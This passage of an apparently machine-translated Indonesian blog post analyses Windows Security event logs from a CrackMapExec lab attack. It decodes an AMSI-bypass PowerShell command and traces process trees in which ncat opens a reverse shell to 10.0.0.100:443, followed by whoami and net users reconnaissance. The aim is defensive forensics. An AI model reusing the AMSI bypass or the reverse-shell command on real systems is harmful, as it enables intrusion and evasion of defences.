WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKAHQAcgB5AHsAIAAKAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAIAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAIAAkAHQAcgB1AGUAKQAKAH0AYwBhAHQAYwBoAHsAfQAKAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAKAA== 1> \127.0.0.1C$WindowsTempRvhXCV 2>&1
Baris perintah di atas tidak perlu dikhawatirkan saat ini. Ini dikodekan base64 dan dengan demikian dapat didekode dengan relatif mudah. Untuk melakukan ini, mari salin string berikut ke dalam file teks.
WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKAHQAcgB5AHsAIAAKAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAIAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAIAAkAHQAcgB1AGUAKQAKAH0AYwBhAHQAYwBoAHsAfQAKAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAKAA==
Dalam kasus saya, saya menamai file teks “securityNik-b64.encoded”. Sekarang saya memiliki file ini, saya akan memanfaatkan “certutil.exe” pada mesin analisis Windows 10 saya, untuk memecahkan kode teks ini.
c:UsersSecurity Nik>certutil -decode -f c:tmpsecurityNik-b64.encoded c:tmpsecurityNik-b64.decoded Input Length = 632 Output Length = 472 CertUtil: -decode command completed successfully. c:UsersSecurity Nik>type c:tmpsecurityNik-b64.decoded [ N e t . S e r v i c e P o i n t M a n a g e r ] : : S e r v e r C e r t i f i c a t V a l i d a t i o n C a l l b a c k = { $ t r u e } ; t r y { [ R e f ] . A s s e m b l y . G e t T y p e ( ' S y s t e m . M a n a g e m e n t . A u t o m a t i o n . A m s i U t i l s ' ) . G e t F i e l d ( ' a m s i I n i t F a i e d ' , ' N o n P u b l i c , S t a t i c ' ) . S e t V a l u e ( $ n u l l , $ t u e ) } c a t c h { } g e t - p r o c e s s
Ahhhh! Akhirnya, kita dapat melihat di atas perintah yang dieksekusi. Kami butuh beberapa saat untuk sampai ke sini, tetapi kami berhasil. Tidak perlu khawatir tentang spasi di antara karakter. Ini karena ini adalah nilai Unicode atau 2 byte (16 bit).
Akhirnya kita melihat akun logoff untuk login ID “0xB48AC1”
04/18/2019 01:33:01 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4634 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Logoff OpCode=Info RecordNumber=172622 Keywords=Audit Success Message=An account was logged off. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48AC1 Logon Type: 3
Barang bagus! Kami memecahkan tantangan itu.
Mari kita beralih ke bagian terakhir dari posting ini. Saat kita melihat bagian terakhir di mana “ncat.exe” dieksekusi, mari kita lihat apa yang bisa kita pelajari dari mereka. Saat kita melewati bagian ini, perhatikan bahwa saya meninggalkan beberapa aktivitas karena mirip dengan apa yang telah kita lihat di atas. Seperti misalnya mengakses share “\*C$” serta membuat dan menghapus file-file sementara seperti “WindowsTempHxuzLk” dan memiliki baris perintah proses seperti “cmd.exe /Q /c cd 1> \127.0.0.1C$WindowsTempHxuzLk 2>&1”. Daripada mengulangi apa yang di atas, mari kita fokus pada item yang lebih relevan.
Kita lihat di bawah yang mirip dengan perintah Powershell, ketika “netcat.exe” dijalankan di bawah, itu
04/18/2019 11:09:49 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=196801 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-20 Account Name: SECNIK-2K19$ Account Domain: SECURITYNIK Logon ID: 0x3E4 Target Subject: Security ID: S-1-0-0 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0x426A10 Process Information: New Process ID: 0x8a8 New Process Name: C:WindowsSystem32cmd.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0x1164 Creator Process Name: C:WindowsSystem32wbemWmiPrvSE.exe Process Command Line: cmd.exe /Q /c c:toolsncat.exe --nodns --exec cmd.exe 10.0.0.100 443 1> \127.0.0.1C$WindowsTempiKxsfQ 2>&1
Pada titik ini, karena kita memiliki log di atas, lebih baik kita mengambil ID masuk “0x426A10” dan mencari semua aktivitas yang terkait dengannya. Namun, ketika saya melakukan ini, saya tidak menemukan entri log “whoami” dan “pengguna bersih”. Akibatnya, saya harus terus menelusuri catatan saya untuk melihat aktivitas setelah waktu di atas. Saat saya melangkah, saya menyadari ada sejumlah masuk dan keluar yang akan mengakibatkan saya tidak melihat “whoami” di bawah sesi ini karena setiap sesi baru harus menghasilkan ID masuk baru. Namun, semua login ini masih menampilkan karakteristik yang sama dengan akses yang mereka minta dan file yang mereka buat.
Saat saya melangkah melewati batang kayu, saya menyadari bahwa saya mendapatkan jackpot. Mari kita berjalan melalui ini.
Log berikutnya adalah tempat semuanya dimulai. Mari kita bangun pohon kita.
Dari bawah, proses “cmd.exe” dengan PID “0xb94” dibuat oleh proses “WmiPrvSE.exe” dengan PID “0x1bc”. Proses “cmd.exe” memiliki baris perintah yang cukup menarik.
start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94)
04/18/2019 11:11:28 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=196910 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-20 Account Name: SECNIK-2K19$ Account Domain: SECURITYNIK Logon ID: 0x3E4 Target Subject: Security ID: S-1-0-0 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0x43115C Process Information: New Process ID: 0xb94 New Process Name: C:WindowsSystem32cmd.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0x1bc Creator Process Name: C:WindowsSystem32wbemWmiPrvSE.exe Process Command Line: cmd.exe /Q /c c:toolsncat.exe --nodns --exec cmd.exe 10.0.0.100 443 1> \127.0.0.1C$WindowsTempvYsGjo 2>&1
Saat kita melihat entri log berikutnya terlihat di bawah bahwa “cmd.exe” dengan PID (0xb94) telah melahirkan “connhost.exe” dengan PID “0xb4”
start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> connhost.exe (0xb4)
04/18/2019 11:11:28 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=196911 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0x43115C Target Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0xb4 New Process Name: C:WindowsSystem32conhost.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0xb94 Creator Process Name: C:WindowsSystem32cmd.exe Process Command Line: ??C:Windowssystem32conhost.exe 0xffffffff -ForceV1
Melanjutkan analisis log kami, kami melihat di bawah bahwa proses “cmd.exe” dengan PID “0xb94” sekarang memunculkan “c:toolsncat.exe” dengan PID “0x9e8”. Kita juga dapat melihat “ncat.exe” terhubung ke perangkat di 10.0.0.100 pada port 443. Menarik!
-> ncat.exe (0x9e8) / start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> connhost.exe (0xb4)
04/18/2019 11:11:28 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=196919 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0x43115C Target Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x9e8 New Process Name: C:Toolsncat.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0xb94 Creator Process Name: C:WindowsSystem32cmd.exe Process Command Line: c:toolsncat.exe --nodns --exec cmd.exe 10.0.0.100 443
Selanjutnya kita melihat proses “ncat.exe” dengan PID “0x9e8” memunculkan shell “cmd.exe” dengan PID “0xb4c”.
-> ncat.exe (0x9e8) -> cmd.exe (0x4bc) / start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> connhost.exe (0xb4)
04/18/2019 11:11:28 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=196925 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0x43115C Target Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0xb4c New Process Name: C:WindowsSysWOW64cmd.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0x9e8 Creator Process Name: C:Toolsncat.exe Process Command Line: cmd.exe
Melihat di bawah, kita sekarang melihat proses “cmd.exe” dengan PID “0xb4c” memunculkan proses bernama “whoami.exe” dengan PID “0xe60”
-> ncat.exe (0x9e8) -> cmd.exe (0x4bc) -> whoami.exe (0xe60) / start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> connhost.exe (0xb4)
04/18/2019 11:11:48 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=196959 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0x43115C Target Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0xe60 New Process Name: C:WindowsSysWOW64whoami.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0xb4c Creator Process Name: C:WindowsSysWOW64cmd.exe Process Command Line: whoami
Selanjutnya kita lihat di bawah, proses “cmd.exe” dengan PID “0x4bc” menjalankan proses “net.exe” dengan PID “0x1360” Perhatikan baris perintah untuk ini menjalankan “pengguna bersih”.
-> net.exe (0x1360) / -> ncat.exe (0x9e8) -> cmd.exe (0x4bc) -> whoami.exe (0xe60) start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> connhost.exe (0xb4)
04/18/2019 11:11:55 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=196966 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0x43115C Target Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x13f0 New Process Name: C:WindowsSysWOW64net.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0xb4c Creator Process Name: C:WindowsSysWOW64cmd.exe Process Command Line: net users
Akhirnya, kita melihat proses “net.exe” dengan PID “0x13f0” memunculkan proses “net1.exe” dengan PID “0x570”
-> net.exe (0x1360) -> net1.exe (0x570) / -> ncat.exe (0x9e8) -> cmd.exe (0x4bc) -> whoami.exe (0xe60) / start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> connhost.exe (0xb4)
04/18/2019 11:11:55 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=196967 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0x43115C Target Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x570 New Process Name: C:WindowsSysWOW64net1.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0x13f0 Creator Process Name: C:WindowsSysWOW64net.exe Process Command Line: C:Windowssystem32net1 users
Baik! Jadi sekarang kami memiliki sejumlah kecerdasan yang masuk akal tentang bagaimana kami dapat menggunakan log kami untuk melihat aktivitas yang dilakukan crackmapexec pada suatu sistem. jelas, Anda harus memiliki tingkat logging yang sesuai untuk dapat memanfaatkan ini secara maksimal.
Lihat sisa posting di bawah ini tentang bagaimana kami melakukan analsis paket mentah dengan memanfaatkan “tshark”, bersama dengan menggunakan alat-alat seperti Snort dan Bro … maaf Zeek.
Referensi:
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4661
https://www.ultimatewindowssecurity.com/securitylog/book/page.aspx?spid=chapter7
https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4661
https://docs.microsoft.com/en-us/windows/desktop/ADSchema/attributes-all
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/177c0db5-fa12-4c31-b75a-473425ce9cca
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-ada1/ac2852b7-cbca-4495-8e66-74fa34bcff59
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-ada3/a499e86b-daa7-463c-bf3a-f052560b0ccf
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=5140
https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5140
https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5145
https://www.morgantechspace.com/2013/10/Event-ID-5145-Detailed-File-Share-Auditing.html
Postingan dalam seri ini:
Bersenang-senang dengan CrackMapExec
Bersenang-senang dengan CrackMapExec – Analisis Log
Bersenang-senang dengan CrackMapExec – Analisis Paket – CrackMapExec
Bersenang-senang dengan CrackMapExec – Analisis Zeek (Bro)
Bersenang-senang dengan CrackMapExec – Analisis Snort IDS/IPS